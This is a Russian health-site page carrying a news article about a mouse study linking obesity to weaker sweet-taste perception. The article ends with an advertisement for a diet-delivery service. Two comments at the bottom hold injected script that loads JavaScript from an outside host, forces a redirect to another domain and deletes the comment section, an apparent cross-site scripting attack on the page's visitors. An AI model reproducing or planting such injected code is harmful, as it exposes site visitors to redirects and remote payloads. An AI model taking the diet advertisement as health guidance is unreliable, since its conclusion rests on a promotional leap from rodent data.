Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лишние килограммы изменяю...  >>  Лишние килограммы изменяют вкус еды
 
Обратная связь
 

Лишние килограммы изменяют вкус еды

Размер шрифта
21 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Почему мы наедаемся и толстеем? А потом все равно наедаемся снова?! Исследователи из университета Буффало (США) считают, что ожирение нарушает восприятие сладкого.

Лишние килограммы изменяют вкус еды

Они провели серию экспериментов на грызунах. В языках пухлых грызунов содержалось меньше нервных клеток (рецепторов), реагирующих на сладкие продукты. Более того: те рецепторы, которые все-таки сохранились, реагировали намного слабее, чем в норме. Что это значит? А то, что толстые хуже чувствуют сладость, поэтому для достижения того же эффекта им нужно больше сладкого, чем худым. Получается порочный круг!

«Исследования показывают, что ожирение является причиной некоторых функциональных изменений в головном мозге. Нам же удалось доказать, что влияние избыточной массы тела распространяется также и на периферическую нервную систему, а именно – на вкусовой анализатор», – рассказывает Кэтрин Медлер, глава исследовательской группы.

«В ходе выполнения наших экспериментов мы выяснили, что ожирение, во-первых, приводит к уменьшению числа вкусовых рецепторов, реагирующих на сладкое, и, во-вторых, повышает порог чувствительности оставшихся», – продолжает свой рассказ доктор Медлер.

Значимость этого открытия трудно переоценить, ведь вкусовое восприятие еды  является одним из важнейших факторов, регулирующих все наше пищевое поведение.

В предыдущих исследования показано, что пациенты с ожирением жаждут съесть как можно больше сладкого, хотя на самом деле они не могут насладиться этим вкусом в той же мере, что и худые люди.

«Если мы поймем конкретный механизм, посредством которого ожирение воздействует на вкусовые рецепторы, то, возможно, мы сможем обратить этот процесс вспять», – поясняет Медлер. «В отличие от нейронов мозга, вкусовые рецепторы легко доступны к исследованию, ведь они находятся на самой поверхности нашего языка».

В исследовании ученые сравнивали две группы мышей по 25 особей в каждой: в одной группе были обычные грызуны, в другой – толстые.

Оказалось, что у мышей с ожирением снижена интенсивность рецепторного ответа на сладкое и, как ни странно, на горькое тоже.

Таким образом, когда вы набираете лишние килограммы, извращается само ваше отношение к пище: вы едите сладкое, но недополучаете удовольствия, и не можете остановиться. А потому вам нужно похудеть.

С помощью «Диеты Елены Малышевой» сделать это как никогда просто и приятно. Уже готовая, правильная еда для похудения будет доставлена вам в любое удобное место и время. Вам останется только есть и худеть.

А с недавних пор худеть стало еще проще с новым приложением Диета Елены Малышевой.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.